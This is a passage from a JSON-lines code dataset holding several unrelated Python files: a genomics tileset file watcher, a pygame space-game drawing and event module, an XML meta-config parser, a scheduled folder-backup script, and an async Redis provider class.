TileSet(\n uuid=uuid,\n datafile=str(event.path),\n datatype=\"matrix\",\n filetype=\"cooler\",\n ).todict()\n })\n\n\n@watch(r\".*\\.(bigwig|bw)$\")\nasync def bigwig(watcher, event):\n uuid = slugid.nice()\n await watcher.tilesets.update({\n slugid.nice(): TileSet(\n uuid=uuid,\n datafile=str(event.path),\n datatype=\"vector\",\n filetype=\"bigwig\"\n ).todict()\n })\n\n\n@watch(r\".*\\.(sam|bam)$\")\ndef bam(event):\n bam_index_path = Path(str(event.path) + \".bai\")\n if not bam_index_path.exists():\n subprocess.call([\"samtools\", \"index\", str(event.path)])\n return bam_index_path\n\n\n@bam.done\nasync def bam_register(watcher, event, bam_index_path):\n if bam_index_path.exists():\n uuid = slugid.nice()\n await watcher.tilesets.update({\n uuid: TileSet(\n uuid=uuid,\n datafile=str(event.path),\n datatype=\"reads\",\n filetype=\"bam\",\n indexfile=str(bam_index_path)\n ).todict()\n })\n\n\n@watch(r'.*\\.bed$')\ndef bed():\n pass\n\n\n@watch(r\".*\\.bedpe$\")\ndef bedpe():\n pass\n\n\n@watch(r\".*\\.(chrom\\.sizes|chromsizes|chromsize)$\")\nasync def chromsizes(watcher, event):\n pass\n","sub_path":"hictools/hgserver/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"381516444","text":"import pygame\nimport tiles\nimport textures\nimport random\nimport buildings\nimport os\n\nclass GameStateManager(object):\n\n def __init__(self, state, system, body, world, cloud):\n self.state = state\n self.system = system\n self.body = body\n self.world = world\n self.cloud = cloud\n self.done = False\n\n def set_state(self, state):\n self.state = state\n\n def add_state(self, val):\n self.state += val\n\n def get_state(self):\n return self.state\n\n def set_system(self, system):\n self.system = system\n\n def get_system(self):\n return self.system\n\n def set_body(self, body):\n self.body = body\n\n def get_body(self):\n return self.body\n\n def set_world(self, world):\n self.world = world\n\n def get_world(self):\n return self.world\n\n def get_cloud(self):\n return self.cloud\n\n def get_done(self):\n return self.done\n\n def set_done(self, value):\n self.done = value\n\n########## States\n# 0 - menu\n# 1 - universe map\n# 2 - system map\n# 3 - planet / star screen\n# 4 - cloud (isometric?)\n####\n\nclass Drawer(object):\n\n def __init__(self, state_manager, data_manager, ui_manager, galaxy, screen):\n self.s_man = state_manager\n self.d_man = data_manager\n self.galaxy = galaxy\n self.screen = screen\n self.ui_man = ui_manager\n self.screen_w = screen.get_width()\n self.screen_h = screen.get_height()\n self.camera_x = self.screen_w/2\n self.camera_y = self.screen_h/2\n self.camera_zoom = 2\n\n self.dir = os.path.dirname(__file__)\n\n self.tile_surface = pygame.Surface((64,64))\n self.current_map = []\n self.tile_images = []\n\n pygame.font.init()\n #self.font = pygame.font.SysFont('oratorstdopentype', 24)\n self.font = pygame.font.SysFont('arial', 24)\n limiting_dimension = self.screen.get_height()\n if self.screen.get_width() < self.screen.get_height():\n limiting_dimension = self.screen.get_width()\n self.body_view_size = int(limiting_dimension*0.7)\n\n self.img_test_red = pygame.transform.scale(pygame.image.load(os.path.join(self.dir,'res','test_red.png')),\n (int(self.body_view_size/4), int(self.body_view_size/4)))\n #\n\n self.init_tile_array()\n self.update_tiles()\n\n def init_tile_array(self):\n self.current_map = []\n tmap = 
self.s_man.get_world().get_tile_map()\n for i in range(len(tmap.map)):\n row = []\n row2 = []\n for j in range(len(tmap.map[i])):\n row.append(None)\n row2.append(None)\n self.current_map.append(row)\n self.tile_images.append(row2)\n self.surface = pygame.Surface((len(tmap.map)*tmap.get_tile_h(), len(tmap.map[0])*tmap.get_tile_w()))\n\n def move_camera(self, move):\n self.camera_x += move[0]\n self.camera_y += move[1]\n\n def zoom_camera(self, zoom):\n if self.camera_zoom + zoom < 0.2:\n self.camera_zoom = 0.2\n else:\n self.camera_zoom += zoom\n\n def zoom_mult(self, value):\n self.camera_zoom *= value\n\n def update_tiles(self):\n tmap = self.s_man.get_world().get_tile_map()\n tw = tmap.get_tile_w()\n th = tmap.get_tile_h()\n\n images = []\n\n for i in range(len(tiles.images)):\n images.append(tiles.images[i])\n\n for i in range(len(tmap.map)):\n for j in range(len(tmap.map[i])):\n if tmap.map[i][j] != self.current_map[i][j]:\n self.current_map[i][j] = tmap.map[i][j]\n x = i * tw\n y = j * th\n self.tile_images[i][j] = images[tmap.map[i][j]]\n image_rect = self.tile_images[i][j].get_rect(topleft = (x, y))\n self.surface.blit(self.tile_images[i][j], image_rect)\n print(\"updated\")\n print(\"done\")\n\n def draw(self):\n if self.s_man.get_state() == 3:\n body = self.s_man.get_body()\n if body.get_type() == 'star':\n image = body.get_image()\n the_cloud = self.s_man.get_cloud()\n sphereimg = textures.img[0]\n\n image = pygame.transform.scale(image, (self.body_view_size, self.body_view_size))\n sphereimg = pygame.transform.scale(sphereimg, (int(self.body_view_size*1.3), int(self.body_view_size*1.3)))\n image_rect = image.get_rect(center=(self.screen_w/2, self.screen_h/2))\n sphere_rect = sphereimg.get_rect(center=(self.screen_w/2, self.screen_h/2))\n\n self.screen.blit(image, image_rect)\n self.screen.blit(sphereimg, sphere_rect)\n\n if body.get_energy_level() == 1:\n upgrade_img = pygame.transform.scale(body.upgrade_img, (int(self.body_view_size*0.3),int(self.body_view_size*0.3)))\n upgrade_rect = upgrade_img.get_rect(center=(self.screen_w/2, self.screen_h/2))\n self.screen.blit(upgrade_img, upgrade_rect)\n\n elif body.get_type() == 'planet':\n image = body.get_image()\n the_cloud = self.s_man.get_cloud()\n\n limiting_dimension = self.screen.get_height()\n if self.screen.get_width() < self.screen.get_height():\n limiting_dimension = self.screen.get_width()\n\n build_select = body.check_mouse((pygame.mouse.get_pos()[0]-self.screen_w/2,\n pygame.mouse.get_pos()[1]-self.screen_h/2), self.body_view_size/2)\n\n image = pygame.transform.scale(image, (int(limiting_dimension*0.7), int(limiting_dimension*0.7)))\n image_rect = image.get_rect(center=(self.screen.get_width()/2, self.screen.get_height()/2))\n\n self.screen.blit(image, image_rect)\n\n for i in range(8):\n if body.buildings[i] == 1:\n build_rect = self.img_test_red.get_rect(center=(body.building_coords[i][0]*self.body_view_size/2+self.screen_w/2,\n body.building_coords[i][1]*self.body_view_size/2+self.screen_h/2))\n self.screen.blit(self.img_test_red, build_rect)\n\n if build_select[0] != None:\n sel_rect = self.img_test_red.get_rect(center=(build_select[0]+self.screen_w/2,build_select[1]+self.screen_h/2))\n self.screen.blit(self.img_test_red, sel_rect)\n\n elif self.s_man.get_state() == 4:\n\n# tmap = self.s_man.get_world().get_tile_map()\n# tw = tmap.get_tile_w()\n# th = tmap.get_tile_h()\n#\n# images = []\n#\n# for i in range(len(tiles.images)):\n# images.append(pygame.transform.scale(tiles.images[i], (int(tw*self.camera_zoom), 
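# update_tiles() above implements a dirty-tile cache: a tile is re-blitted
# onto an off-screen Surface only when its id changes, and the draw() branch
# for state 4 just scales that one cached surface per frame instead of
# redrawing every tile. The core of the idea, reduced to a free function:
import pygame

def refresh_tile_cache(surface, tile_map, cache, images, tile_w, tile_h):
    for i, row in enumerate(tile_map):
        for j, tile_id in enumerate(row):
            if cache[i][j] != tile_id:       # redraw only tiles that changed
                cache[i][j] = tile_id
                surface.blit(images[tile_id], (i * tile_w, j * tile_h))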
int(th*self.camera_zoom))))\n#\n# for i in range(len(tmap.map)):\n# for j in range(len(tmap.map[i])):\n# x = self.camera_x - self.screen_w/2 + i * tw * self.camera_zoom\n# y = self.camera_y - self.screen_h/2 + j * th * self.camera_zoom\n# image = pygame.transform.scale(images[tmap.map[i][j]], (int(tw*self.camera_zoom), int(th*self.camera_zoom)))\n# image_rect = image.get_rect(topleft = (x, y))\n# self.screen.blit(image, image_rect)\n#\n x = self.camera_x - self.screen_w/2\n y = self.camera_y - self.screen_h/2\n surf = pygame.transform.scale(self.surface, (int(self.camera_zoom*self.surface.get_width()), int(self.camera_zoom*self.surface.get_height())))\n self.screen.blit(surf, (x, y))\n\n elif self.s_man.get_state() == 5:\n\n start_x = 0\n start_y = self.screen.get_height()/2\n start_pos = (start_x, start_y)\n\n tmap = self.s_man.get_world().get_tile_map()\n tw = tmap.get_tile_w()\n th = tmap.get_tile_h()\n\n for i in range(len(tmap.map)):\n for j in reversed(range(len(tmap.map[i]))):\n x = start_x + (tw/2)*(i+j)\n y = start_y + (th/2)*(j-i)\n image = tiles.images[tmap.map[i][j]]\n image_rect = image.get_rect(bottomleft=(x,y+th/2))\n self.screen.blit(image, image_rect)\n\n elif self.s_man.get_state() == 2:\n\n bodies = self.s_man.get_system().bodies\n num_bodies = len(bodies)\n\n screen_w = self.screen.get_width()\n screen_h = self.screen.get_height()\n\n total_w = 0\n current_w = 0\n\n for i in bodies:\n total_w += i.get_image().get_width()\n\n for i in range(num_bodies):\n image = bodies[i].get_image()\n w = image.get_width()\n h = image.get_height()\n x = 0.9*screen_w - 0.8*i*((screen_w-total_w)/num_bodies) - current_w\n y = screen_h/2\n rect = image.get_rect(midright=(x,y))\n self.screen.blit(image, rect)\n current_w += w\n\n mouse_x = pygame.mouse.get_pos()[0]\n mouse_y = pygame.mouse.get_pos()[1]\n\n if mouse_x<=x and mouse_x>=x-w:\n if mouse_y>=y-h/2 and mouse_y<=y+h/2:\n self.ui_man.draw_text_box(bodies[i].get_name(), True, (10,10,10), (180,180,180), x+w/10, y-h/2)\n if pygame.mouse.get_pressed()[0]:\n self.s_man.set_body(bodies[i])\n self.s_man.set_state(3)\n\n self.ui_man.draw()\n\nclass RandomEventManager(object):\n\n def __init__(self, state_manager, data_manager):\n self.s_man = state_manager\n self.d_man = data_manager\n\n def update(self):\n if random.randint(1,60) == 1: # make people randomly move into cloud\n self.d_man.add_value('money', self.d_man.price)\n self.d_man.add_value('storage', 10)\n self.s_man.get_cloud().add_population(10)\n random.choice(self.s_man.system.planets).add_population(-10)\n self.s_man.system.update_population()\n\nclass EventHandler(object):\n\n def __init__(self, state_manager, data_manager, ui_manager, build_manager, drawer, galaxy, screen):\n self.s_man = state_manager\n self.d_man = data_manager\n self.b_man = build_manager\n self.galaxy = galaxy\n self.screen = screen\n self.screen_w = screen.get_width()\n self.screen_h = screen.get_height()\n self.ui_man = ui_manager\n self.drawer = drawer\n self.world = self.s_man.get_world()\n self.last_mouse_x = 0\n self.last_mouse_y = 0\n\n def update(self):\n # if pygame.mouse.get_pressed()[0]:\n # self.ui_man.check_button_pressed(pygame.mouse.get_pos())\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n self.ui_man.check_button_pressed(pygame.mouse.get_pos()) # check buttons\n if self.s_man.get_state() == 3 and self.s_man.get_body().get_type() == 'planet':\n build_index = 
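# The state-5 branch above projects grid cell (i, j) isometrically with
# x = ox + (tw/2)*(i + j) and y = oy + (th/2)*(j - i); solving that pair of
# equations gives the inverse, which is what mouse picking would need. A
# standalone round-trip check:
def iso_project(i, j, tw, th, ox, oy):
    return ox + (tw / 2) * (i + j), oy + (th / 2) * (j - i)

def iso_unproject(x, y, tw, th, ox, oy):
    u = (x - ox) / (tw / 2)                  # u = i + j
    v = (y - oy) / (th / 2)                  # v = j - i
    return (u - v) / 2, (u + v) / 2

x, y = iso_project(3, 5, 64, 32, 0, 240)
print(iso_unproject(x, y, 64, 32, 0, 240))   # -> (3.0, 5.0)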
self.s_man.get_body().check_mouse((pygame.mouse.get_pos()[0]-self.drawer.screen_w/2,\n pygame.mouse.get_pos()[1]-self.drawer.screen_h/2), self.drawer.body_view_size/2)[2]\n if build_index != None: # build\n self.s_man.get_body().buildings[build_index] = 1\n self.b_man.add('mines', buildings.Mine())\n if self.s_man.get_state() == 4: # build tiles\n index = self.s_man.get_world().get_tile_map().get_index(\n pygame.mouse.get_pos(), (self.drawer.camera_x, self.drawer.camera_y),\n self.drawer.camera_zoom, (self.screen_w, self.screen_h))\n self.b_man.build_tile(self.world, index, 1)\n self.drawer.update_tiles()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 4:\n self.drawer.zoom_mult(2)\n elif event.button == 5:\n self.drawer.zoom_mult(0.5)\n if event.type == pygame.QUIT:\n self.s_man.set_done(True)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.s_man.set_done(True)\n if event.key == pygame.K_UP and self.s_man.get_state()<4:\n self.s_man.add_state(1)\n if event.key == pygame.K_DOWN and self.s_man.get_state()>2:\n self.s_man.add_state(-1)\n if self.s_man.get_state() == 4:\n if pygame.mouse.get_pressed()[0]:\n self.drawer.move_camera((- self.last_mouse_x + pygame.mouse.get_pos()[0], - self.last_mouse_y + pygame.mouse.get_pos()[1]))\n\n self.last_mouse_x = pygame.mouse.get_pos()[0]\n self.last_mouse_y = pygame.mouse.get_pos()[1]\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":13338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534857161","text":"__author__ = 'tylerzhu'\n\nfrom lxml import etree\n\n\nclass Macro():\n def __init__(self, name, value, desc):\n self.name = name\n self.value = value\n self.desc = desc\n\n\nclass StructItem():\n def __init__(self, name, type, cname, size, count, refer):\n self.name = name\n self.type = type\n self.cname = cname\n self.size = size\n self.count = count\n self.refer = refer\n\n\nclass Struct():\n def __init__(self, name, sort_key, items, is_refered, version):\n self.name = name\n self.sort_key = sort_key\n self.items = items\n self.is_refered = is_refered\n self.version = version\n\n\nclass MetaConfig():\n def __init__(self, config):\n self.meta = {}\n self.macros = []\n self.structs = []\n #\n self.load_config(config)\n\n def get_macro_by_name(self, name):\n if name != \"\":\n for macro in self.macros:\n if macro.name == name:\n return macro\n return None\n\n def load_config(self, config):\n # 解析meta文件\n meta_file = etree.parse(config)\n meta_root = meta_file.getroot()\n\n #\n self.meta = meta_root.attrib\n for node in meta_root:\n # macro\n if node.tag == \"macro\":\n macro = Macro(\n node.attrib[\"name\"],\n node.attrib[\"value\"],\n node.attrib[\"desc\"]\n )\n self.macros.append(macro)\n elif node.tag == \"struct\":\n self.structs.append(\n self.parse_struct(node)\n )\n pass\n\n def parse_struct(self, node):\n struct_name = node.attrib[\"name\"]\n struct_version = node.attrib[\"version\"]\n struct_sortkey = None\n if \"sortkey\" in node.attrib:\n struct_sortkey = node.attrib[\"sortkey\"]\n\n struct_items = []\n for item in node:\n if item.tag != \"entry\":\n continue\n name = item.attrib[\"name\"]\n type = item.attrib[\"type\"]\n cname = item.attrib[\"cname\"]\n # 数组元素个数,如果为0表示不是数据\n count = 0\n if \"count\" in item.attrib:\n count = item.attrib[\"count\"]\n # 字符串的大小,如果为0表示不是字符串\n size = 0\n if \"size\" in item.attrib:\n size = item.attrib[\"size\"]\n refer = None\n if \"refer\" in item.attrib:\n refer = 
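# EventHandler.update above converts a mouse click into a tile index via
# get_index(), whose body is not shown in the record. A plausible version,
# inferred from the camera transform Drawer.draw applies in state 4 — the
# formula is an assumption, not the record's actual implementation:
def screen_to_tile(mouse, camera, zoom, screen_size, tile_size):
    (mx, my), (cx, cy) = mouse, camera
    sw, sh = screen_size
    tw, th = tile_size
    world_x = (mx - (cx - sw / 2)) / zoom    # undo translation, then zoom
    world_y = (my - (cy - sh / 2)) / zoom
    return int(world_x // tw), int(world_y // th)

print(screen_to_tile((400, 300), (640, 360), 2.0, (1280, 720), (64, 64)))  # (3, 2)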
item.attrib[\"refer\"]\n\n # name, type, cname, size, count, refer\n struct_item = StructItem(\n name, type, cname, size, count, refer\n )\n struct_items.append(struct_item)\n\n # 生成结构体(name, sort_key, items, is_refered, version)\n return Struct(\n struct_name, struct_sortkey, struct_items, False, struct_version\n )\n pass","sub_path":"convert/convert/metaParser.py","file_name":"metaParser.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336183809","text":"#Import the APScheduler\nfrom apscheduler.schedulers.background import BackgroundScheduler\nimport shutil\nimport time\nimport os.path\n\nsched = BackgroundScheduler()\n\n#Append log\nwith open(\"[LOOPER]-LOG.txt\", \"a\") as f:\n f.write(\"\\r\\nThis file was appended on \" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"\\r\\n\")\n\n#This job copies the data of the server to a vault\n@sched.scheduled_job('cron', year='*', month='*', day='*', week='*', day_of_week='*', hour='*', id=\"looper-001\")\ndef looper_job():\n with open(\"[LOOPER]-LOG.txt\", \"a\") as f:\n f.write(\"--[\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][LOOPER has reinstated]\\r\\n\")\n try:\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Preparing to copy]\\r\\n\")\n s = \"C:/Users/Glitc/PycharmProjects/dzs_overwatch/playground\"\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Source selected: \" + s + \"]\\r\\n\")\n d = (\"C:/Users/Glitc/PycharmProjects/dzs_overwatch/vault/[\" + time.strftime(\"%m-%Y\") + \"]/[\" + time.strftime(\"%d ~ \") + time.strftime(\"%H-%M-%S\") + \"]backup_server\")\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Destination selected: \" + d + \"]\\r\\n\")\n # Begin copy\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Begin copy...]\\r\\n\")\n shutil.copytree(s, d)\n except:\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][-][COPY HAS FAILED]\\r\\n\")\n else:\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Copy has been succesful]\\r\\n\")\n finally:\n f.write(\"--[\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][LOOPER will go in a slumber]\\r\\n\\r\\n\")\n\n#Start the schedule\nsched.start()\nprint('Press Ctrl+C to exit to stop LOOPER')\n\ntry:\n # This is here to simulate application activity (which keeps the main thread alive).\n while True:\n time.sleep(2)\nexcept (KeyboardInterrupt, SystemExit):\n # Not strictly necessary if daemonic mode is enabled but should be done if possible\n sched.shutdown()","sub_path":"looper.py","file_name":"looper.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"365982716","text":"#!/usr/bin/env python3\n\"\"\" Redis async Provider.\nNotes on redis Provider\n--------------------\nThis provider implements a few subset of funcionalities from aredis, is a WIP\nTODO:\n - use jsonpath to query json-objects\n - implements lists and hash datatypes\n\"\"\"\n\nimport asyncio\nimport aredis\nimport objectpath\nimport time\nfrom typing import Callable\n\nfrom asyncdb.exceptions import *\nfrom asyncdb.providers import (\n BasePool,\n BaseProvider,\n 
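# Each log line in the looper.py scheduler job above calls time.strftime()
# twice, so a message written across a second (or midnight) boundary can carry
# two different timestamps. Capturing the timestamp once per message avoids
# that; a small helper using the same format:
import time

def log_line(tag, message):
    now = time.strftime("%d/%m/%Y - %H:%M:%S")    # evaluated exactly once
    return "[{}][{}][{}]\r\n".format(now, tag, message)

print(log_line("+", "LOOPER has reinstated"), end="")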
registerProvider,\n)\nfrom asyncdb.utils import *\n\n\nclass asyncredisPool(BasePool):\n _dsn: str = \"redis://{host}:{port}/{db}\"\n _client: Callable = None\n _max_queries = 300\n _pool = None\n _connection = None\n _encoding: str = \"utf-8\"\n properties: dict = {}\n\n def __init__(self, dsn=\"\", loop=None, params={}, **kwargs):\n super(asyncredisPool, self).__init__(dsn=dsn, loop=loop, params=params)\n self._pool = None\n try:\n if params[\"encoding\"]:\n self._encoding = params[\"encoding\"]\n except KeyError:\n pass\n if \"max_queries\" in kwargs:\n self._max_queries = kwargs[\"max_queries\"]\n\n def get_loop(self):\n return self._loop\n\n # Create a redis connection pool\n async def connect(self, **kwargs):\n \"\"\"\n __init async db initialization\n \"\"\"\n self.logger.debug(\"Asyncio Redis Pool: Connecting to {}\".format(self._dsn))\n try:\n self._pool = aredis.ConnectionPool.from_url(\n self._dsn,\n connection_class=aredis.Connection,\n max_connections=self._max_queries,\n connect_timeout=self._timeout,\n decode_responses=True,\n retry_on_timeout=True,\n loop=self._loop,\n **kwargs,\n )\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Connection error to Redis: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Unable to connect to Redis: {}\".format(str(err)))\n # is connected\n if self._pool:\n try:\n # create the connection and get the properties:\n self._connection = aredis.StrictRedis(connection_pool=self._pool)\n self.properties = await self._connection.info()\n except Exception as err:\n raise ProviderError(\"Unable to connect to Redis: {}\".format(str(err)))\n self._connected = True\n self._initialized_on = time.time()\n\n async def acquire(self):\n \"\"\"\n Take a connection from the pool.\n \"\"\"\n db = None\n self._connection = None\n # Take a connection from the pool.\n try:\n if not self._pool:\n await self._pool.connect()\n self._connection = aredis.StrictRedis(connection_pool=self._pool)\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ConnectionError(\n \"Redis Pool is closed o doesnt exists: {}\".format(str(err))\n )\n except Exception as err:\n raise ProviderError(\"Redis Pool Acquire Error: {}\".format(str(err)))\n return False\n if self._connection:\n db = asyncredis(connection=self._connection, pool=self)\n return db\n\n async def release(self, connection=None):\n \"\"\"\n Release a connection from the pool\n \"\"\"\n if not connection:\n conn = self._connection\n else:\n if isinstance(connection, asyncredis):\n conn = connection.engine()\n if isinstance(connection, aredis.connection.Connection):\n conn = connection\n else:\n return True\n try:\n if not conn:\n return True\n self._pool.release(conn)\n except Exception as err:\n raise ProviderError(\"Release Error: {}\".format(str(err)))\n\n async def close(self, timeout=5):\n \"\"\"\n Close Pool\n \"\"\"\n try:\n if self._connection:\n await self.release(self._connection)\n if self._pool:\n self._pool.disconnect()\n self._connected = False\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ConnectionError(\n \"Redis Pool is closed o doesnt exists: {}\".format(str(err))\n )\n except Exception as err:\n logging.exception(\"Pool Closing Error: {}\".format(str(err)))\n return False\n\n def is_closed(self):\n self._logger.debug(\"Connection closed: %s\" % (not self._connected))\n return not self._connected\n\n async def execute(self, sentence, *args, 
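# A typical lifecycle for the pool above — connect, acquire a wrapper, use it,
# release, close. The import path follows the record's sub_path and the DSN is
# a placeholder, so treat this as a sketch. Note that release()'s isinstance
# chain tests `connection` twice, so passing the wrapper returns True early
# without ever reaching self._pool.release(conn).
import asyncio
from asyncdb.providers.asyncredis import asyncredisPool

async def main():
    pool = asyncredisPool(dsn="redis://localhost:6379/0")
    await pool.connect()
    db = await pool.acquire()            # returns an asyncredis wrapper
    try:
        await db.set("probe", "1")
        print(await db.get("probe"))
    finally:
        await pool.release(db)
        await pool.close()

asyncio.run(main())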
**kwargs):\n \"\"\"\n Execute a connection into the Pool\n \"\"\"\n if self._pool:\n try:\n result = await self._connection.execute_command(\n sentence, *args, **kwargs\n )\n return result\n except TypeError as err:\n raise ProviderError(\"Execute Error: {}\".format(str(err)))\n except (\n aredis.exceptions.ConnectionError,\n aredis.exceptions.RedisError,\n ) as err:\n raise ProviderError(\"Connection close Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Execute Error: {}\".format(str(err)))\n\n async def test_connection(self, key: str = \"TEST_123\", optional: str = \"\"):\n result = None\n error = None\n try:\n await self.execute(\"set\", key, optional)\n result = await self.execute(\"get\", key)\n except Exception as err:\n error = err\n finally:\n await self.execute(\"DEL\", key)\n return [result, error]\n\n\nclass asyncredis(BaseProvider):\n _provider = \"redis\"\n _syntax = \"json\"\n _pool = None\n _dsn = \"redis://{host}:{port}/{db}\"\n _connection = None\n _connected = False\n _loop = None\n _encoding = \"utf-8\"\n\n def __init__(self, dsn=\"\", connection=None, pool=None, loop=None, params={}):\n super(asyncredis, self).__init__(dsn=dsn, loop=loop, params=params)\n if pool:\n self._pool = pool\n self._loop = self._pool.get_loop()\n self._connection = connection\n try:\n if params[\"encoding\"]:\n self._encoding = params[\"encoding\"]\n except KeyError:\n pass\n\n \"\"\"\n Context magic Methods\n \"\"\"\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n asyncio.run_until_complete(self.release())\n\n async def __aenter__(self):\n await self.connection()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:\n # clean up anything you need to clean up\n await self.close()\n self._connection = None\n\n \"\"\"\n Properties\n \"\"\"\n\n @property\n def pool(self):\n return self._pool\n\n def loop(self):\n return self._loop\n\n @property\n def redis(self):\n return self._connection\n\n def engine(self):\n return self._connection.connection_pool._available_connections[0]\n\n # Create a redis pool\n async def connection(self, **kwargs):\n \"\"\"\n __init async redis initialization\n \"\"\"\n self.logger.info(\"AsyncRedis: Connecting to {}\".format(self._dsn))\n try:\n if self._pool:\n self._connection = aredis.StrictRedis(connection_pool=self._pool)\n else:\n self._connection = aredis.StrictRedis.from_url(\n self._dsn,\n loop=self._loop,\n encoding=self._encoding,\n connect_timeout=self._timeout,\n decode_responses=True,\n retry_on_timeout=True,\n **kwargs,\n )\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ProviderError(\n \"Unable to connect to Redis, connection Refused: {}\".format(str(err))\n )\n except Exception as err:\n raise ProviderError(\"Unknown Redis Error: {}\".format(str(err)))\n return False\n # is connected\n if self._connection:\n self._connected = True\n self._initialized_on = time.time()\n\n async def release(self):\n \"\"\"\n Release a connection and return into pool\n \"\"\"\n if self._pool:\n await self._pool.release(connection=self._connection)\n\n async def close(self):\n if self._connection:\n try:\n for conn in self._connection.connection_pool._available_connections:\n conn.disconnect()\n conn = None\n except Exception as err:\n logging.exception(\"Error closing Redis Connection\")\n finally:\n del self._connection\n self._connected = False\n\n async def execute(self, sentence, *args, **kwargs):\n \"\"\"execute.\n Execute a command\n 
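# The provider class above implements __aenter__/__aexit__, so a connection
# can be scoped with `async with`: __aenter__ awaits connection() and
# __aexit__ awaits close(). A usage sketch (import path assumed from the
# record's sub_path, DSN is a placeholder):
import asyncio
from asyncdb.providers.asyncredis import asyncredis

async def demo():
    async with asyncredis(dsn="redis://localhost:6379/0") as redis:
        await redis.ping()               # connection is closed on exit

asyncio.run(demo())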
\"\"\"\n try:\n result = await self._connection.execute_command(sentence, *args, **kwargs)\n return result\n except TypeError as err:\n raise ProviderError(\"Execute Error: {}\".format(str(err)))\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Connection close Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Execute Error: {}\".format(str(err)))\n\n async def prepare(self):\n pass\n\n async def test_connection(self, key: str = \"TEST_123\", optional: str = \"\"):\n result = None\n error = None\n try:\n await self.set(key, optional)\n result = await self.get(key)\n except Exception as err:\n error = err\n finally:\n await self.delete(key)\n return [result, error]\n\n def is_closed(self):\n self._logger.debug(\"Connection closed: %s\" % (not self._connected))\n return bool(not self._connected)\n\n async def ping(self, msg: str = \"\"):\n if msg:\n await self._connection.echo(msg)\n else:\n await self._connection.ping()\n\n async def query(self, key=\"\", *val):\n return await self.get(key, val)\n\n async def queryrow(self, key=\"\", *args):\n pass\n\n async def set(self, key, value):\n try:\n return await self._connection.set(key, value)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Unknown Error: {}\".format(str(err)))\n\n async def get(self, key):\n try:\n return await self._connection.get(key)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Unknown Error: {}\".format(str(err)))\n\n async def clear_redis(self):\n \"\"\"\n Clear a cache\n \"\"\"\n try:\n return await self._connection.flushall()\n except Exception as e:\n print(f\"Error cleaning Cache: {e!s}\")\n raise Exception(f\"Error cleaning Cache: {e!s}\")\n\n async def clear_db(self):\n \"\"\"\n Clear a cache\n \"\"\"\n try:\n return await self._connection.flushdb()\n except Exception as e:\n self._logger.error(f\"Error cleaning DB: {e!s}\")\n raise Exception(f\"Error cleaning DB: {e!s}\")\n\n async def exists(self, key) -> bool:\n if not self._connection:\n await self.connection()\n try:\n return bool(await self._connection.exists(key))\n except (aredis.exceptions.RedisError) as err:\n print(err)\n raise ProviderError(\"Redis Exists Error: {}\".format(str(err)))\n except Exception as err:\n print(err)\n raise ProviderError(\"Redis Exists Unknown Error: {}\".format(str(err)))\n\n async def m_exists(self, *keys):\n \"\"\" Existence of multiples Keys \"\"\"\n if not self._connection:\n await self.connection()\n try:\n return await self._connection.execute_command(\"EXISTS\", *keys)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Exists Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Exists Unknown Error: {}\".format(str(err)))\n\n async def delete(self, key, *keys):\n try:\n return await self._connection.delete(key, *keys)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Exists Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Exists Unknown Error: {}\".format(str(err)))\n\n async def expire(self, key, seconds=0):\n try:\n return await self._connection.expire(key, seconds)\n except TypeError:\n raise ProviderError(\n \"Redis: wrong Expiration Number: {}\".format(str(seconds))\n 
